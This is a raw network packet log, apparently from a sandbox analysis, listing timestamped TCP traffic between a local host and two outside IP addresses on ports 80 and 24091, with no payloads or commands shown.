Oct 14, 2021 08:40:32.013988018 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014013052 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014038086 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014041901 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014064074 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014090061 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014115095 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014141083 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014166117 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014190912 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014216900 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014218092 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014224052 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014241934 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014267921 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014292955 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014317989 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014343977 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014369011 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014394045 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014394999 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014401913 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014420986 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014446974 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014472961 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014498949 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014523983 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014549971 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014571905 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014575958 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014600992 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014626026 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014652014 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014677048 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014702082 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014727116 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014751911 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014776945 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014796972 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014802933 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014828920 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014853954 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014878988 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.014971972 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.014992952 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.015149117 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.035235882 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035366058 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035417080 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035463095 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035497904 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.035507917 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035545111 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.035558939 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035671949 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.035819054 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035845041 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.035866022 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035885096 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.035912991 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.035958052 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036003113 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036149025 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036159992 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036168098 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036237001 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036283970 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036325932 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036329985 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036375046 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036420107 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036493063 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036540031 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036555052 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036585093 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036593914 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036633015 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036679029 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036722898 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036732912 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036768913 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036772013 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036815882 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036859035 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036861897 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036870956 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.036907911 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036953926 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.036998987 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037034988 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037045956 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037046909 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037091017 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037136078 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037180901 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037225008 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037264109 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037270069 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037302017 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037313938 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037317038 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037363052 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037409067 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037440062 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037455082 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037502050 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037547112 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037591934 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037616014 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037637949 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037655115 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037664890 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037684917 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037729979 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037775993 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037794113 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037821054 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037904978 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.037919998 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037933111 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037941933 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.037954092 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038001060 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038045883 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038090944 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038096905 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038136959 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038183928 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038228989 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038275003 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038275003 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038285971 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038320065 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038364887 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038408995 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038453102 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038497925 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038501978 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038541079 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038543940 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038589001 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038635015 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038680077 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038677931 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038717031 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038727045 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038773060 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038805962 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038816929 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038819075 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038825989 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038835049 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.038865089 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038911104 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038954973 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.038985014 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039021015 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039068937 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039113998 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039159060 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039170980 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039205074 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039251089 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039297104 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039340019 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039343119 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039366007 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039382935 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039390087 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039395094 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039411068 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039436102 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039483070 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039516926 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039527893 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039575100 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039619923 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039665937 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.039690971 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039716959 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039864063 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.039885044 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.040039062 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.225502014 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:32.376689911 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:32.376888037 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:32.387161016 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:32.571041107 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:32.621653080 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:32.771806955 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:32.776031971 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:32.978279114 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:32.978538990 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:33.179116964 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:33.276309013 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:33.277410030 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:33.483134031 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:34.296202898 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:34.302006960 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:40:34.499089003 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:40:36.988239050 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:36.988514900 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:48.967494965 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:48.988116026 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:48.988322973 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:48.988596916 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.009063005 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010281086 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010343075 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010391951 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010440111 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010479927 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010497093 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010524988 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010576963 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010581017 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010591030 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010649920 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010673046 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010711908 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010757923 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010806084 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.010811090 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010862112 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010874987 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.010987997 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.031682968 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.031750917 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.031799078 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.031843901 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.031867027 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.031925917 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.031933069 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.031991005 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032012939 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032052994 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032099962 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032104969 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032141924 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032174110 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032210112 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032238007 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032258987 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032300949 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032326937 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032365084 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032412052 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032444000 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032474041 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032522917 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032526970 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032569885 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032594919 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032644033 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032648087 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032659054 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032716036 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032763958 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032768011 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032778025 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032835960 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.032859087 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032907009 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.032994032 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.053599119 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.053659916 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.053706884 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.053774118 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.053802967 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.053879976 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.053935051 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.053985119 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054028988 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054076910 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054100037 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054140091 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054179907 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054198980 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054244995 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054253101 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054306984 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054352999 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054378033 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054388046 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054425001 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054472923 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054517984 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054524899 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054578066 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054594040 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054639101 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054687977 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054692984 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054744959 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054757118 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054765940 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054817915 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054852962 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054877043 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054902077 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.054939032 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054984093 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.054989100 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055044889 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055048943 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055102110 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055115938 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055161953 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055210114 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055213928 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055253983 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055283070 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055329084 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055350065 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055391073 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055438042 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055443048 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055486917 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055506945 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055536985 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055568933 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055586100 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055630922 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055675983 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055721045 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055728912 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055737972 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055797100 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055824995 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055859089 CEST	80	49810	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:49.055874109 CEST	49810	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:49.055919886 CEST	80	49810	83.167.224.147	192.168.11.20
